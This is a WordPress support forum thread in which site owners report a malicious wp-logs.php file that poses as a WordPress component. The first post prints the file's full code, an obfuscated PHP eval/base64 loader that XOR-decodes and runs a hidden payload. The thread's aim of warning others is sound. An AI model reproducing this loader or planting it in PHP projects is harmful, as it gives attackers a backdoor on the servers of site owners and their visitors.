Title: wp-logs.php
Last modified: August 19, 2016

---

# wp-logs.php

 *  [upoopoo](https://wordpress.org/support/users/upoopoo/)
 * (@upoopoo)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/wp-logsphp/)
 * This is actually not related to wordpress at all, but since the file is trying
   to impersonate a component of wordpress I thought I would post here. Basically
   there is a wp-logs.php script that get’s run. Code looks like this:
 * <?eval(base64_decode(“JGs9MTQyOyRtPWV4cGxvZGUoIjsiLCIxNzA7MjM3OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjMxOzIyNDsyMzE7MjUwOzE2NjsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIwMDsyMDc7MTk5OzE5NDsxOTM7MTkyOzIwMzsyMjA7MjIwOzE5MzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMDA7MTkzOzE5NDsxOTQ7MTkzOzIxNzsxOTQ7MTkzOzIwNTsyMDc7MjE4OzE5OTsxOTM7MTkyOzE2MjsxNzQ7MjUwOzI1MjsyNTE7MjM1OzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjAzOzE5MjsyMDU7MTkzOzIwMjsxOTk7MTkyOzIwMTsxNzQ7MTYyOzE3NDsxNjk7MjMzOzI0NDsyMzE7MjU0OzE2MjsxNzQ7MjM0OzIzNTsyMzI7MjI2OzIzOTsyNTA7MjM1OzE2OTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMTsyMjE7MTk0OzIwOTsyMTY7MjAzOzIyMDsxOTk7MjAwOzIxNTsyMjI7MjAzOzIwMzsyMjA7MTYyOzE3NDsxOTA7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMTk7MjIxOzIwMzsyMjA7MjA3OzIwMTsyMDM7MTkyOzIxODsxNjI7MTc0OzE3MjsxOTM7MjU0OzIzNTsyNTI7MjM5OzE2MTsxODM7MTYwOzE4NzsxOTE7MTc0OzE2NjsyMTc7MjMxOzIyNDsyMzQ7MjI1OzI0OTsyNTM7MTc0OzE5MjsyMTg7MTc0OzE4NzsxNjA7MTkxOzE4MTsxNzQ7MjE5OzE4MTsxNzQ7MjUxOzI1MzsxNjc7MTcyOzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjE5OzIyMDsxOTQ7MTYyOzE3NDsxNzA7MjA5OzIyMDsyMDM7MjIzOzIxOTsyMDM7MjIxOzIxODsyMTM7MTY5OzIyNTsyMjk7MjI0OzIyNTsyNDk7MTY5OzIxMTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMDsyMDM7MjE4OzIxOTsyMjA7MTkyOzIxODsyMjA7MjA3OzE5MjsyMjE7MjAwOzIwMzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsxNzA7MjI1OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI0NjsyMzU7MjM3OzE2NjsxNzA7MjM3OzE2NzsxODE7MjMxOzIzMjsxNjY7MjM3OzI1MTsyNTI7MjI2OzIwOTsyMzU7MjUyOzI1MjsyMjQ7MjI1OzE2NjsxNzA7MjM3OzE2NzsxNjc7MTc0OzI0NTsxMzU7MjM1OzIzNzsyMzA7MjI1OzE2OTsxNzg7MTc1OzE2MzsxNjM7MTc0OzI1MTsxODk7MjUyOzE4NzsyNDk7MTg1OzIzNTsxNzQ7MTYzOzE2MzsxNzY7MTY5OzE2MDsxNzA7MjI1OzE4MTsyMzU7MjM3OzIzMDsyMjU7MTc0OzE3MjsyMDM7MjUyOzI1MjsyMjU7MjUyOzE3NDsyMjQ7MjUxOzIyNzsyMzY7MjM1OzI1MjsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI0OzIyNTsxNjY7MTcwOzIzNzsxNjc7MTc0OzE2MDsxNzI7MjEwOzIyNDsxNzI7MTgxOzIzNTsyMzc7MjMwOzIyNTsxNzQ7MTcyOzIwMzsyNTI7MjUyOzIyNTsyNTI7MTc0OzIyNzsyMzU7MjUzOzI1MzsyMzk7MjMzOzIzNTsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI1OzI1MjsxNjY7MTcwOzIzNzsxNjc7MTYwOzE3MjsyMTA7MjI0OzE3MjsxODE7MjQzOzE3NDsyMzU7MjI2OzI1MzsyMzU7MTc0OzI0NTsyMzU7MjM3OzIzMDsyMjU7MTY5OzE3ODsxNzU7MTYzOzE2MzsxNzQ7MjUxOzE4ODsyNTI7MTg2OzI0OTsxODQ7MjM1OzE3NDsxNjM7MTYzOzE3NjsxNjk7MTYwOzE3MDsyMjU7MTgxOzI0MzsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7”));?
   >
 * If you find this running on your server, get rid of it. I still haven’t found
   what was the original exploit that got this on the server in the first place,
   working on it. Please post here if you have found the source of the exploit or
   have any additional useful information.

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [gregmce](https://wordpress.org/support/users/gregmce/)
 * (@gregmce)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/wp-logsphp/#post-1291249)
 * Ah, crap, I found it on one of my sites too. Thanks for the heads up, and any
   more information would be greatly appreciated!
 *  [brnskll](https://wordpress.org/support/users/brnskll/)
 * (@brnskll)
 * [15 years, 6 months ago](https://wordpress.org/support/topic/wp-logsphp/#post-1291636)
 * Just was told that a logs.php file was running a script on one of my sites. I
   checked my previous backups and it appears that an index.html was replaced by
   this. My hosting company suspended my account without an explanation as to what
   it was.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘wp-logs.php’ is closed to new replies.

 * 2 replies
 * 3 participants
 * Last reply from: [brnskll](https://wordpress.org/support/users/brnskll/)
 * Last activity: [15 years, 6 months ago](https://wordpress.org/support/topic/wp-logsphp/#post-1291636)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics